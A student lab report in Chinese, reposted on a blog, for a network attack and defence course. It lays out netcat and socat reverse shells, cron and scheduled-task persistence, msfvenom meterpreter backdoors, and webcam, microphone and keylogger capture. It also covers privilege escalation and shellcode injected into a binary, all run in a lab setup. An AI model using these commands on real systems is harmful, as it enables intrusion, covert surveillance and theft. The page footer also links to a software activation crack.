首页 > 其他分享 >20222310 2024-2025-1 《网络与系统攻防技术》实验二实验报告

20222310 2024-2025-1 《网络与系统攻防技术》实验二实验报告

时间:2024-10-17 19:44:16浏览次数:5  
标签:后门 exe 8888 windows 主机 虚拟机 2024 2025 20222310

一、实验内容

1.使用netcat获取主机操作Shell,cron启动某项任务(任务自定)。
PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

2.使用socat获取主机操作Shell, 任务计划启动。

3.使用MSF meterpreter生成后门,利用ncat或socat传送到主机并运行获取主机Shell。

4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权。

5.使用MSF生成shellcode,注入到实验1中的pwn1中,获取反弹连接Shell。

二、实验过程

1.使用netcat获取主机操作Shell,cron启动某项任务

先关闭防火墙和杀毒软件,在windows主机上安装netcat。windows打开终端,ipconfig查看主机的IP地址。

windows终端ncat.exe -l -p 8888(l表示listen,“监听”;p表示port,指定端口,端口号可自行指定,这里选择8888号端口)

kali终端nc 172.16.178.56 8888-e bin/sh(nc即netcat,后面的参数是要连接的ip和port,-e是指定连接后运行的程序,本例中就是shell。这里选用windows的ip和8888号端口)

windows终端ls,显示了kali虚拟机的文件名,说明成功连接并获取shell。

进入kali的root用户,crontab -e(执行文字编辑器来设定时程表),选择2:/usr/bin/vim.basic

输入后进入文字编辑器,30 * * * * /bin/netcat 172.16.178.56 8888 -e /bin/sh (输入自己主机的IP地址,在每小时的第30分钟启动任务)

编辑好后退出文字编辑器,crontab -l查看时程表

在Linux主机中的/var/spool/cron/crontabs文件中会出现一个root文件

windows终端与linux建立连接后,切换到root模式,echo "* * * * * echo "20222310" > /home/kali/2310_1.txt" > /var/spool/cron/crontabs/root crontab -l (检查时程表)

kali虚拟机进入对应路径检查2310_1.txt文件,修改成功。

2.使用socat获取主机操作Shell,任务计划启动

windows下载socat,cmd进入socat文件夹,socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口8888,并把cmd.exe的stderr重定向到stdout)

kali进入root用户,socat - tcp:172.16.217.17:8888

windows准备一个c语言编译运行的.exe文件"20222310shiyan2.exe",然后kali命令行schtasks /create /sc minute /mo 1 /tn "20222310" /tr "C:\Users\Administrator\Desktop\20222310shiyan2.exe"(一分钟执行一次)

windows主机打开计算机管理,观察到正在运行的"20222310"任务,说明实验成功。

3.使用MSF meterpreter生成后门,利用ncat或socat传送到主机并运行获取主机Shell

这一步之前先把windows的防火墙和杀毒软件关闭。

kaliifconfig查看虚拟机的ip地址。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.216.188 LPORT=8888 -f exe > 2310backdoor.exe(使用msfvenom 工具生成一个反向 TCP Meterpreter shell 的 payload,并将其保存到一个可执行文件2310backdoor.exe)

LHOST=172.16.216.188是shell连接的主机ip地址

LPORT=8888是攻击者监听的端口号

-f exe指定了 payload 的格式,这里是exe

2310backdoor.exe是生成的恶意可执行文件

主机进入ncat目录下,ncat.exe -lv 8888 > "C:\Users\Administrator\Desktop\2310backdoor.exe"(监听8888窗口等待接收可执行文件2310backdoor.exe,并将2310backdoor.exe文件存放在桌面上)

kali终端nc 172.16.216.188 8888 < 2310backdoor.exe(将生成的后门文件2310backdoor.exe传给主机)

windows桌面成功找到2310backdoor.exe后门可执行程序

kali终端msfconsole

use exploit/multi/handler(使用监听模块,设置payload)

set payload windows/meterpreter/reverse_tcp(使用和生成后门程序时相同的payload)

set LHOST 172.16.216.188(攻击机的IP地址)

set LPORT 8888(监听的端口)

exploit(运行监听模块)

windows主机运行2310backdoor.exe,然后kali虚拟机输入ls,可以查看windows桌面内容,说明已经连接。

4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

在exploit模块继续输入以下命令:

record_mic音频

screenshot截屏

webcam_snap拍照

keyscan_start开始读取键盘记录

keyscan_dump结束读取键盘记录

音频截屏和拍照在桌面上就可以看到,键盘记录的字符串将显示在命令栏上

确保windows的cmd指令是使用管理员身份运行的,继续在exploit模块中继续输入getuid查看当前用户getsystem提权

5.使用MSF生成shellcode,注入到实验1中的pwn1中,获取反弹连接Shell

kali终端输入Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.216.188 LPORT=8888 -x /home/zhengxiancheng/Desktop/pwn20222310 -f elf > 2310_pwn,使用msfvenom 工具生成一个 Meterpreter 反向 TCP shell的 payload,并将其注入到指定的可执行文件中,然后将结果输出到一个名为 2310_pwn的文件中。

-p linux/x86/meterpreter/reverse_tcp:指定生成的 payload 类型

LHOST=172.16.216.188:目标主机 IP 地址为172.16.216.188,即虚拟机IP地址

LPORT=8888:设置 Meterpreter shell 使用的本地端口号为 8888

-x /home/zhengxiancheng/Desktop/pwn20222310:指定一个可执行文件作为模板

-f elf:指定输出文件的格式为 ELF 格式,适用于 Linux 系统的可执行文件格式

对2310_pwn文件赋予权限chmod a+x 2310_pwn

msfconsole

use exploit/multi/handler=

set payload windows/meterpreter/reverse_tcp

set LHOST 172.16.216.188

set LPORT 8888

exploit

重新监听过程

打开另一个终端,运行2310_pwn文件,回到第一个终端,成功实现远程控制shell。

三、问题及解决方案

问题1:edge浏览器下载netcat会因为检测危险下载失败。

问题1解决方案:切换到微信进行下载。

问题2:下载的多个版本的socat中没有socat.exe可执行文件。

问题2解决方案:下载https://gitee.com/wildlinux/NetSec/attach_files中的socat。

问题3:在进行第三个实验目标时在主机上运行后门文件时,虚拟机没有反应。

问题3解决方案:这个问题的原因是虚拟机的ip地址被隐藏成了10.0.2.15,虚拟机设置的连接方式有问题,应该改成桥接网卡,具体可以参考https://blog.csdn.net/2301_79896143/article/details/135114730此文章。修改连接方式后虚拟机的ip地址改变了,问题迎刃而解。

四、回答问题

1.例举你能想到的一个后门进入到你系统中的可能方式?

答:通过含有恶意附件的电子邮件下载和运行后门程序。这些附件可能伪装成文档、图片或其他常见文件格式

2.例举你知道的后门如何启动起来(win及linux)的方式?

答:win:注册表修改、计划启动服务;linux:cron作业

3.Meterpreter有哪些给你映像深刻的功能?

答:生成后门程序,生成shellcode

4.如何发现自己有系统有没有被安装后门?

答:查看系统日志,分析可疑进程,检查启动项,使用可信任的杀毒软件等

五、学习感悟、思考等

通过此次实验,我学会了如何主机获得虚拟机的shell,虚拟机获得主机的shell,远程获得shell。我对ncat,socat等传输软件也有了初步的认识和使用经验,对后门也有了初步的了解。后门是一种用于绕过正常身份验证过程的恶意程序,通常用于允许攻击者远程访问系统。
在虚拟机上进行实验注定不是一帆风顺的过程,一个小小的错误就可能导致后续出现重大问题,比如我在完成第三个实验目标时,仅仅因为虚拟机网络连接方式有问题,导致我在主机上运行后门时,虚拟机没有反应,这个问题困扰了我三四个小时,最后我灵机一动搜索10.0.2.15这个ip地址,才得知这是一个隐藏ip地址,虚假的ip地址,是无法获得结果的重点。
这次实验也让我对网络安全有了更深的理解,深刻认识到了网络安全的重要性,后门程序可以控制主机,获得主机的隐私内容,来历不明的电子邮件或网站等都可能包含恶意后门程序,我们在上网时需要对来历不明的链接心怀警惕之心。

标签:后门,exe,8888,windows,主机,虚拟机,2024,2025,20222310
From: https://www.cnblogs.com/abe1fan/p/18472946

相关文章

  • IntelliJ IDEA 2024 安装使用 (附加激活码、补丁,亲测有效!)
    第一步:下载IDEA安装包访问IDEA官网,下载IDEA2024.1.4版本的安装包,下载链接如下:idea官方链接也可以在这里点击下载idea下载idea第二步:安装IDEA点击xx关掉程序!第三步:下载补丁下载地址(里面包含激活码)https://pan.quark.cn/s/9dbfe698c064补丁下载成功后,......
  • 2024初秋集训——提高组 #40
    B.艰难睡眠题目描述一天有\(M\)分钟,依次编号\(1,2,\dots,M\)。有\(N\)个人,第\(i\)个人会在\(A_i\)分钟开始吵闹,持续\(B_i\)分钟(可能会到第二天)。现在你想要睡连续\(k\)分钟,所以你要使得这\(k\)分钟内没人吵闹。你可以花费\(c_{i,j}\)的代价让第\(i\)个人从......
  • 20241017
    袜子分配(socks)我们可以考虑一下我们是怎么暴搜的,我们搜出一个\(2\timesn\)长度的序列,然后枚举每相邻两个数字,判断是不是合法的,那么也就是说,一个数字想合法,他必须精准的落在这个序列中的一个位置,那么概率是\(2\timesn-1\),有\(n\)对数字,那么期望就是\(n\div......
  • CSP2024 前集训:多校A层冲刺NOIP2024模拟赛08
    前言光顾着想T2了,但是不知道哪儿假了,只有\(\dfrac{n}{k}\le5\)的点是对的,然后居然只有二十分,发现数据放错了,找喵喵改了成五十了。然后T1因为重边挂没了。T3没调出来,确切的说是省的时间不多了打不完,就写了个部分分。T4咕了。机房凳子没靠椅,一直坐着腰快折了肿么办。......
  • 2024年软件设计师中级(软考中级)详细笔记【6】结构化开发方法(分值3~4)
    目录前言6.1系统分析与设计概述6.1.2系统设计的基本原理6.1.3系统总体结构设计6.1.4系统文档6.2.2数据流图6.2.3数据字典(DD)6.5用户界面设计6.5.1用户界面设计的黄金原则杂题习题:结语前言在备考软件设计师中级考试的过程中,我遇到了些许挑战,也收获了宝贵的......
  • 20241016
    intarr[3]={10,20,30};int*parr=arr;1.*parr、*arr分别代表什么   *(parr+0)==*(arr+0)==10==》取首素值=========================================================================      2.*(parr+1)、*(arr+1)、*parr+1、*arr+1分别......
  • 『模拟赛』多校A层冲刺NOIP2024模拟赛08
    Rank还行A.传送(teleport)签。单元最短路,先想Dijkstra。发现这道题还有个不同寻常的移动方式,可以以\(min\left(|x_i-x_j|,|y_i-y_j|\right)\)的代价从\(i\)移动到\(j\)。暴力连边是\(\mathcal{O(n^2)}\)的,时间空间都过不去。被叫去整内务在楼梯上想到,一个点不应......
  • 题解:GZOI2024 D2T2 乒乓球
    考场上切了,但是比较神奇的题,应该是蓝/紫。Discription乒乓球\(\text{}\)时间限制:\(\bold{3}\)秒众所周知,一场乒乓球比赛共有两个玩家\(A\)和\(B\)参与,其中一场比赛由多局比赛组成,而每局比赛中又由多盘比赛组成。每盘比赛\(A\)或\(B\)只有一名选手获胜。当其中一名......
  • 【ACM独立出版 | EI稳检索 】第三届公共卫生与数据科学国际学术会议(ICPHDS 2024)
    随着大数据和人工智能的迅速发展,数据科学在公共卫生领域的应用越来越广泛。会议议题将涵盖公共卫生数据的收集、处理、分析和解读,以及数据科学在流行病学、健康管理、决策支持、公共卫生政策、数据科学理论、人工智能技术、健康大数据分析等方面的应用。第三届公共卫生与数据科......
  • 网络安全2024就业前景如何?找工作容易吗?
    众所周知,网络安全与我们息息相关,无论是企业还是个人都应该重视网络安全。 而网络安全作为一个新兴行业,人才需求量远大于供给,因此在薪资福利上具有很大的优势,但对于初学者而言,很多人依然担心前景问题,那么网络安全就业前景如何?本文将为大家介绍一下。从目前市场情况来讲,网络安......